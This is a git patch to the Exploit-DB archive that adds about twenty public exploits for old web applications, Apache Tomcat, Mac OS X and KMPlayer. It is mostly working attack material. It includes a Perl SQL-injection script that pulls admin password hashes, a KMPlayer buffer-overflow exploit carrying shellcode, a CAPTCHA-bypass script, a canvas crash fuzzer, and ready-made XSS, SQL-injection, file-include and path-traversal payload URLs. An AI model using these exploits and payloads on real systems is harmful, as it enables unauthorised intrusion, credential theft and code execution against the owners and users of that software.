From cf9a24defe9607fdf5876e15c853994098a9993e Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 11 Mar 2014 04:29:44 +0000
Subject: [PATCH] Updated 03_11_2014

---
 files.csv                                    | 21 ++++++++-
 platforms/asp/webapps/32151.pl               | 48 ++++++++++++++++++++
 platforms/multiple/remote/32137.txt          | 15 ++++++
 platforms/multiple/remote/32138.txt          | 23 ++++++++++
 platforms/osx/dos/32136.html                 | 16 +++++++
 platforms/php/webapps/32134.txt              |  7 +++
 platforms/php/webapps/32135.txt              | 10 ++++
 platforms/php/webapps/32139.txt              |  9 ++++
 platforms/php/webapps/32140.txt              | 10 ++++
 platforms/php/webapps/32141.txt              |  7 +++
 platforms/php/webapps/32142.php              | 21 +++++++++
 platforms/php/webapps/32143.txt              | 13 ++++++
 platforms/php/webapps/32144.txt              |  9 ++++
 platforms/php/webapps/32145.txt              |  9 ++++
 platforms/php/webapps/32146.txt              |  9 ++++
 platforms/php/webapps/32147.txt              |  9 ++++
 platforms/php/webapps/32148.txt              |  9 ++++
 platforms/php/webapps/32149.txt              |  9 ++++
 platforms/php/webapps/32150.txt              |  9 ++++
 platforms/windows/local/32152.py             | 32 +++++++++++++
 platforms/windows/{local => remote}/32132.py |  0
 21 files changed, 294 insertions(+), 1 deletion(-)
 create mode 100755 platforms/asp/webapps/32151.pl
 create mode 100755 platforms/multiple/remote/32137.txt
 create mode 100755 platforms/multiple/remote/32138.txt
 create mode 100755 platforms/osx/dos/32136.html
 create mode 100755 platforms/php/webapps/32134.txt
 create mode 100755 platforms/php/webapps/32135.txt
 create mode 100755 platforms/php/webapps/32139.txt
 create mode 100755 platforms/php/webapps/32140.txt
 create mode 100755 platforms/php/webapps/32141.txt
 create mode 100755 platforms/php/webapps/32142.php
 create mode 100755 platforms/php/webapps/32143.txt
 create mode 100755 platforms/php/webapps/32144.txt
 create mode 100755 platforms/php/webapps/32145.txt
 create mode 100755 platforms/php/webapps/32146.txt
 create mode 100755 platforms/php/webapps/32147.txt
 create mode 100755 platforms/php/webapps/32148.txt
 create mode 100755 platforms/php/webapps/32149.txt
 create mode 100755 platforms/php/webapps/32150.txt
 create mode 100755 platforms/windows/local/32152.py
 rename platforms/windows/{local => remote}/32132.py (100%)

diff --git a/files.csv b/files.csv
index cdcb83647..7735d8540 100755
--- a/files.csv
+++ b/files.csv
@@ -28911,4 +28911,23 @@ id,file,description,date,author,platform,type,port
 32129,platforms/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 PLF File Stack Buffer Overflow Vulnerability",2008-07-30,"fl0 fl0w",windows,remote,0
 32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0
 32131,platforms/php/webapps/32131.txt,"ClipSharePro <= 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0
-32132,platforms/windows/local/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,local,0
+32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0
+32134,platforms/php/webapps/32134.txt,"H0tturk Panel 'gizli.php' Remote File Include Vulnerability",2008-07-31,U238,php,webapps,0
+32135,platforms/php/webapps/32135.txt,"common solutions csphonebook 1.02 'index.php' Cross Site Scripting Vulnerability",2008-07-31,"Ghost Hacker",php,webapps,0
+32136,platforms/osx/dos/32136.html,"Apple Mac OS X 10.x CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0
+32137,platforms/multiple/remote/32137.txt,"Apache Tomcat <= 6.0.16 'RequestDispatcher' Information Disclosure Vulnerability",2008-08-01,"Stefano Di Paola",multiple,remote,0
+32138,platforms/multiple/remote/32138.txt,"Apache Tomcat <= 6.0.16 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability",2008-08-01,"Konstantin Kolinko",multiple,remote,0
+32139,platforms/php/webapps/32139.txt,"freeForum 1.7 'acuparam' Parameter Cross-Site Scripting Vulnerability",2008-08-01,ahmadbady,php,webapps,0
+32140,platforms/php/webapps/32140.txt,"PHP-Nuke Book Catalog Module 1.0 'catid' Parameter SQL Injection Vulnerability",2008-08-01,"H4ckCity Security Team",php,webapps,0
+32141,platforms/php/webapps/32141.txt,"Homes 4 Sale 'results.php' Cross Site Scripting Vulnerability",2008-08-04,"Ghost Hacker",php,webapps,0
+32142,platforms/php/webapps/32142.php,"Pligg 9.9.5 'CAPTCHA' Registration Automation Security Bypass Weakness",2008-08-02,"Micheal Brooks",php,webapps,0
+32143,platforms/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 'login.php' SQL Injection Vulnerability",2008-08-04,crimsoN_Loyd9,php,webapps,0
+32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 day.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 week.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32146,platforms/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 month.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32147,platforms/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 search.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 report.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 help.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5 'connector.php' Local File Include Vulnerability",2008-08-04,"Sina Yazdanmehr",php,webapps,0
+32151,platforms/asp/webapps/32151.pl,"Pcshey Portal 'kategori.asp' SQL Injection Vulnerability",2008-08-04,U238,asp,webapps,0
+32152,platforms/windows/local/32152.py,"KMPlayer 3.8.0.117 - Buffer Overflow",2014-03-10,metacom,windows,local,0
diff --git a/platforms/asp/webapps/32151.pl b/platforms/asp/webapps/32151.pl
new file mode 100755
index 000000000..63a0bd0bd
--- /dev/null
+++ b/platforms/asp/webapps/32151.pl
@@ -0,0 +1,48 @@
+source: http://www.securityfocus.com/bid/30534/info
+
+Pcshey Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+#!/usr/bin/perl
+#Coded By U238
+#Discovered By U238
+#mail : setuid.noexec0x1]at]hotmail.com
+#From : Türkiye / Erzincan
+#Thnx : The_BekiR - ZeberuS - Fahn - ka0x - Deep Power - Marco Almeida
+#Gretz: http://bilisimMimarileri.com
+     : http://bilgiguvenligi.gov.tr
+    Mesut Timur & Alper Canak
+
+use LWP::Simple;
+my $bekir= $ARGV[0];
+
+if(!$ARGV[0]) {
+
+print "\nExploit Options\n";
+print "\nUse:perl victim.pl [domain]\n";
+exit(0);
+}
+sleep(2);
+
+print "\n\nPlease Loading&#8230;!$bekir\n\n";
+
+$nrc=q[forum/kategori.asp?kid=26+union+select+0,1,2,parola,4,kullanici,6,7+f
+rom+uyeler+where+id=1];
+# where+id=2,3
+$zeb=get($ARGV[0].$nrc) or die print "dont worked";
+
+print "Exploit Succesful";
+
+print "Connecting..: $ARGV[0]n";
+sleep(3);
+
+$zeb=~m/<font face="Tahoma"><strong></strong></font></td>/&& print "admin
+hash: $baba";
+
+
+print "dont username !" if(!$baba);
+
+$zeb=~m/<font face="Tahoma"><strong></strong></font></td>/&& print "pass
+!!: $baba";
+print "dont pass" if(!$baba);
diff --git a/platforms/multiple/remote/32137.txt b/platforms/multiple/remote/32137.txt
new file mode 100755
index 000000000..174f4ea27
--- /dev/null
+++ b/platforms/multiple/remote/32137.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/30494/info
+
+Apache Tomcat is prone to a remote information-disclosure vulnerability.
+
+Remote attackers can exploit this issue to obtain the contents of sensitive files stored on the server. Information obtained may lead to further attacks.
+
+The following versions are affected:
+
+Tomcat 4.1.0 through 4.1.37
+Tomcat 5.5.0 through 5.5.26
+Tomcat 6.0.0 through 6.0.16
+
+Tomcat 3.x, 4.0.x, and 5.0.x may also be affected.
+
+http://www.example.com/page.jsp?blah=/../WEB-INF/web.xml 
\ No newline at end of file
diff --git a/platforms/multiple/remote/32138.txt b/platforms/multiple/remote/32138.txt
new file mode 100755
index 000000000..eaf033fd6
--- /dev/null
+++ b/platforms/multiple/remote/32138.txt
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/30496/info
+
+Apache Tomcat is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects the following versions:
+
+Tomcat 4.1.0 through 4.1.37
+Tomcat 5.5.0 through 5.5.26
+Tomcat 6.0.0 through 6.0.16 
+
+<%@page contentType="text/html"%>
+<%
+~  // some unicode characters, that result in CRLF being printed
+~  final String CRLF = "\u010D\u010A";
+
+~  final String payload = CRLF + CRLF + "<script
+type='text/javascript'>document.write('Hi, there!')</script><div
+style='display:none'>";
+~  final String message = "Authorization is required to access " + payload;
+~  response.sendError(403, message);
+%>
diff --git a/platforms/osx/dos/32136.html b/platforms/osx/dos/32136.html
new file mode 100755
index 000000000..7ddef7dd9
--- /dev/null
+++ b/platforms/osx/dos/32136.html
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/30488/info
+
+Apple Mac OS X is prone to multiple memory-corruption vulnerabilities that affect the CoreGraphics component.
+
+Attackers can exploit these issues to execute arbitrary code in the context of the affected application or cause denial-of-service conditions.
+
+The following versions are affected:
+
+Mac OS X v10.4.11 and prior
+Mac OS X Server v10.4.11 and prior
+Mac OS X v10.5.4 and prior
+Mac OS X Server v10.5.4 and prior
+
+NOTE: These issues were previously covered in BID 30483 (Apple Mac OS X 2008-005 Multiple Security Vulnerabilities), but have been given their own record to better document them. 
+
+<body> <font face="arial,helvetica"> <font size=+3><code><CANVAS></code> fuzzer</font><font size=-1> by <a href="mailto:lcamtuf@coredump.cx">lcamtuf@coredump.cx</a></font><p> <div id=ccont> <canvas id=canvas height=200 width=300 style="border: 1px solid teal"></canvas> </div> <img id=image src="envelope.gif" align=top> <p> <input type=checkbox id=dealloc> Deallocate canvas after every cycle (NULL ptr in Safari, likely exploitable in Opera)<br> <input type=checkbox id=keep_ctx> Keep context (if combined with above, NULL ptr Firefox, likely exploitable in Opera)<br> <input type=checkbox id=scale_large> Use large canvas scaling (likely exploitable in Opera, bogs down Firefox)<br> <input type=checkbox id=return_undef> Return <code>undefined</code> values (NULL ptr Safari, may hang Opera)<br> <input type=checkbox id=return_large> Return large integers (exploitable crash in Safari, OOM/DoS elsewhere)<br> <input type=checkbox id=quick> Skip time-consuming operations (quicker, but may miss issues)<p> <input type=submit value="Begin tests" id=button onclick="setup_all()"><p> <script> var ctx; /* Canvas context */ var imgObj; /* Reference image */ var scval = 1; var transval = 0; var quick; var dealloc; var return_undef; var return_large; var scale_large; var keep_ctx; var iht; function setup_all() { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); imgObj = document.getElementById('image'); iht = document.getElementById('ccont').innerHTML; quick = document.getElementById('quick').checked; dealloc = document.getElementById('dealloc').checked; return_undef = document.getElementById('return_undef').checked; return_large = document.getElementById('return_large').checked; scale_large = document.getElementById('scale_large').checked; keep_ctx = document.getElementById('keep_ctx').checked; document.getElementById('button').disabled = true; setInterval('do_fuzz();',1); } function R(x) { return Math.floor(Math.random() * x); } function make_number() { var v; var sel; if (return_large == true && R(3) == 1) sel = R(6); else sel = R(4); if (return_undef == false && sel == 0) sel = 1; if (R(2) == 1) v = R(100); else switch (sel) { case 0: break; case 1: v = 0; break; case 2: v = 0.000001; break; case 3: v = 10000; break; case 4: v = 2000000000; break; case 5: v = 1e100; break; } if (R(4) == 1) v = -v; return v; } function make_color() { if (R(2) == 1) return "#C0F0A0"; else return "#000090"; } function make_fill() { var sel; if (quick == true) sel = 0; else sel = R(6); switch (sel) { case 0: case 1: case 2: return make_color(); break; case 3: var r = ctx.createLinearGradient(make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 4: var r = ctx.createRadialGradient(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); for (i=0;i<4;i++) r.addColorStop(make_number(),make_color()); return r; break; case 5: var r = ctx.createPattern(imgObj,"repeat"); if (R(6) == 0) r.addColorStop(make_number(),make_color()); return r; break; } } function do_fuzz() { if (dealloc == true) document.getElementById('ccont').innerHTML = iht; if (keep_ctx == false) { var canvas = document.getElementById('canvas'); ctx = canvas.getContext('2d'); } for (i=0;i<100;i++) { try { switch (R(33)) { case 0: ctx.fillStyle = make_fill(); break; case 1: ctx.globalAlpha = Math.random() - .5; break; case 2: switch (R(3)) { case 0: ctx.globalCompositeOperation = 'copy'; break; case 1: ctx.globalCompositeOperation = 'xor'; break; case 2: ctx.globalCompositeOperation = 'source-over'; break; } break; case 3: switch (R(2)) { case 0: ctx.lineCap = 'round'; break; case 1: ctx.lineCap = 'butt'; break; } break; case 4: switch (R(2)) { case 0: ctx.lineJoin = 'round'; break; case 1: ctx.lineJoin = 'miter'; break; } break; case 5: ctx.lineWidth = make_number(); break; case 6: ctx.miterLimit = make_number(); break; case 7: if (quick == true) break; ctx.shadowBlur = make_number(); break; case 8: if (quick == true) break; ctx.shadowColor = make_fill(); break; case 9: if (quick == true) break; ctx.shadowOffsetX = make_number(); ctx.shadowOffsetY = make_number(); break; case 10: ctx.restore(); break; case 11: ctx.rotate(make_number()); break; case 12: ctx.save(); break; case 13: ctx.scale(-1,-1); break; case 14: if (quick == true) break; if (transval == 0) { transval = make_number(); ctx.translate(transval,0); } else { ctx.translate(-transval,0); transval = 0; } break; case 15: ctx.clearRect(make_number(),make_number(),make_number(),make_number()); break; case 16: if (quick == true) break; ctx.drawImage(imgObj,make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 17: ctx.fillRect(make_number(),make_number(),make_number(),make_number()); break; case 18: ctx.beginPath(); break; case 19: // ctx.clip() is evil. break; case 20: ctx.closePath(); break; case 21: ctx.fill(); break; case 22: ctx.stroke(); break; case 23: ctx.strokeRect(make_number(),make_number(),make_number(),make_number()); break; case 24: if (quick == true) break; ctx.arc(make_number(),make_number(),make_number(),make_number(),make_number(),true); break; case 25: if (quick == true) break; ctx.arcTo(make_number(),make_number(),make_number(),make_number(),make_number()); break; case 26: if (quick == true) break; ctx.bezierCurveTo(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 27: ctx.lineTo(make_number(),make_number()); break; case 28: ctx.moveTo(make_number(),make_number()); break; case 29: if (quick == true) break; ctx.quadraticCurveTo(make_number(),make_number(),make_number(),make_number()); break; case 30: if (quick == true) break; ctx.transform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 31: if (quick == true) break; ctx.setTransform(make_number(),make_number(),make_number(),make_number(),make_number(),make_number()); break; case 32: if (scale_large == true) { switch (scval) { case 0: ctx.scale(-1000000000,1); ctx.scale(-1000000000,1); scval = 1; break; case 1: ctx.scale(-.000000001,1); scval = 2; break; case 1: ctx.scale(-.000000001,1); scval = 0; break; } } break; } } catch (e) { } } } </script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/32134.txt b/platforms/php/webapps/32134.txt
new file mode 100755
index 000000000..05a117749
--- /dev/null
+++ b/platforms/php/webapps/32134.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30468/info
+
+H0tturk Panel is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. 
+
+http://www.example.com/hot/gizli.php?cfgProgDir=cmd.txt? 
\ No newline at end of file
diff --git a/platforms/php/webapps/32135.txt b/platforms/php/webapps/32135.txt
new file mode 100755
index 000000000..679e009f7
--- /dev/null
+++ b/platforms/php/webapps/32135.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30485/info
+
+The 'csphonebook' program (from common solutions) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects csphonebook 1.02; other versions may also be affected. 
+
+
+http://www.example.com/index.php?letter=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/32139.txt b/platforms/php/webapps/32139.txt
new file mode 100755
index 000000000..74d7a04ad
--- /dev/null
+++ b/platforms/php/webapps/32139.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30509/info
+
+freeForum is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+freeForum 1.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/?acuparam=>"><ScRiPt>alert(111)</ScRiPt> http://www.example.com/path/index.php/>'><ScRiPt>alert(111)</ScRiPt> http://www.example.com/path/index.php?acuparam=>"><ScRiPt>alert(111)</ScRiPt> 
\ No newline at end of file
diff --git a/platforms/php/webapps/32140.txt b/platforms/php/webapps/32140.txt
new file mode 100755
index 000000000..87faba42d
--- /dev/null
+++ b/platforms/php/webapps/32140.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30511/info
+
+
+The Book Catalog module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/modules.php?name=BookCatalog&op=category&catid=1+-9+union+select+1,pwd+from+nuke_authors
+http://www.example.com/modules.php?name=BookCatalog&op=category&catid=1+-9+union+select+1,aid+from+nuke_authors
+
diff --git a/platforms/php/webapps/32141.txt b/platforms/php/webapps/32141.txt
new file mode 100755
index 000000000..59de37827
--- /dev/null
+++ b/platforms/php/webapps/32141.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30517/info
+
+Homes 4 Sale is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/result.php?r=c%253E%255BHWtZYeidnW%257BdH%253A1MnOwcR%253E%253E%2527tfbsdi%2560uzqf%253Etfbsdi%2527f%253Ebtl%253CTB%253C67%253C2% 253C2%253C498984%253Ctuzmf2%256067%252Fdtt%253C3%253Cjoufsdptnpt%2560bggjmjbuf%25602%2560e3s%2560efsq%253Cksfct31%253Cksfct31%253C93454%253C43642%253Cbtl %253C%253C0e0tfbsdi0q0joufsdptnpt0ynm0epnbjomboefs0joum0e3s0gfg0qpqdbu0w30%253Cqbslfe%252Ftzoejdbujpo%252Fbtl%252Fdpn%2527jqvb%2560je%253E%253A%253A597&K eywords= 
\ No newline at end of file
diff --git a/platforms/php/webapps/32142.php b/platforms/php/webapps/32142.php
new file mode 100755
index 000000000..9e40dd99b
--- /dev/null
+++ b/platforms/php/webapps/32142.php
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/30518/info
+
+Pligg is prone to a security-bypass weakness.
+
+Successfully exploiting this issue will allow an attacker to register multiple new users through an automated process. This may lead to other attacks.
+
+Pligg 9.9.5 is vulnerable; other versions may also be affected.
+
+<?php
+
+$sitekey=82397834;
+
+$ts_random=$_REQUEST[&#039;ts_random&#039;];
+
+$datekey = date(?F j?);
+
+$rcode = hexdec(md5($_SERVER[&#039;HTTP_USER_AGENT&#039;] . $sitekey . $ts_random . $datekey));
+
+print substr($rcode, 2, 6);
+
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/32143.txt b/platforms/php/webapps/32143.txt
new file mode 100755
index 000000000..9f791cd52
--- /dev/null
+++ b/platforms/php/webapps/32143.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/30529/info
+
+Keld PHP-MySQL News Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Keld PHP-MySQL News Script 0.7.1 is vulnerable; other versions may also be affected. 
+
+The following proofs of concept are available:
+
+A. admin' OR 1=1/*
+B. fdfds' OR 1=1 limit x/*
+C.' AND 1=2 union select 1,2/* 
\ No newline at end of file
diff --git a/platforms/php/webapps/32144.txt b/platforms/php/webapps/32144.txt
new file mode 100755
index 000000000..92b884d66
--- /dev/null
+++ b/platforms/php/webapps/32144.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MRBS 1.2.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/path/day.php?area=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32145.txt b/platforms/php/webapps/32145.txt
new file mode 100755
index 000000000..a46ca99d2
--- /dev/null
+++ b/platforms/php/webapps/32145.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+ 
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+MRBS 1.2.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/path/week.php?area=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32146.txt b/platforms/php/webapps/32146.txt
new file mode 100755
index 000000000..97e45e8d9
--- /dev/null
+++ b/platforms/php/webapps/32146.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+  
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+MRBS 1.2.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/path/month.php?area=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32147.txt b/platforms/php/webapps/32147.txt
new file mode 100755
index 000000000..51332c73d
--- /dev/null
+++ b/platforms/php/webapps/32147.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+   
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+   
+MRBS 1.2.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/path/search.php?area=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32148.txt b/platforms/php/webapps/32148.txt
new file mode 100755
index 000000000..21735cba9
--- /dev/null
+++ b/platforms/php/webapps/32148.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+    
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+    
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+    
+MRBS 1.2.6 is vulnerable; other versions may also be affected.
+ 
+http://www.example.com/path/report.php?area=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32149.txt b/platforms/php/webapps/32149.txt
new file mode 100755
index 000000000..11b3133de
--- /dev/null
+++ b/platforms/php/webapps/32149.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+     
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+     
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+     
+MRBS 1.2.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/help.php?area=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/32150.txt b/platforms/php/webapps/32150.txt
new file mode 100755
index 000000000..0f84a2237
--- /dev/null
+++ b/platforms/php/webapps/32150.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30533/info
+
+UNAK-CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+UNAK-CMS 1.5.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=/file.type%00 
\ No newline at end of file
diff --git a/platforms/windows/local/32152.py b/platforms/windows/local/32152.py
new file mode 100755
index 000000000..40c6af13a
--- /dev/null
+++ b/platforms/windows/local/32152.py
@@ -0,0 +1,32 @@
+#!/usr/bin/python
+# KMPlayer 3.8.0.117 Buffer Overflow
+# Author: metacom
+# Tested on: Windows Xp pro-sp3 En
+# Download link :http://www.chip.de/downloads/KMPlayer_33859258.html
+# Version: 3.8.0.117 Kmp Plus
+# Howto / Notes:
+# Run KMPlayer Playlist Editor > New Album and paste Exploit Code
+import struct
+def little_endian(address):
+  return struct.pack("<L",address)
+  
+
+junk = "\x41" * 250
+eip = little_endian(0x7C86467B)   #7C86467B   FFE4  JMP ESP  kernel32.dll        
+
+shellcode=(
+        "\x31\xC9"                #// xor ecx,ecx        
+        "\x51"                    #// push ecx        
+        "\x68\x63\x61\x6C\x63"    #// push 0x636c6163        
+        "\x54"                    #// push dword ptr esp        
+        "\xB8\xC7\x93\xC2\x77"    #// mov eax,0x77c293c7        
+        "\xFF\xD0"                #// call eax  
+		)
+
+exploit = junk + eip + shellcode
+try:
+    rst= open("crash.txt",'w')
+    rst.write(exploit)
+    rst.close()
+except:
+    print "Error"
\ No newline at end of file
diff --git a/platforms/windows/local/32132.py b/platforms/windows/remote/32132.py
similarity index 100%
rename from platforms/windows/local/32132.py
rename to platforms/windows/remote/32132.py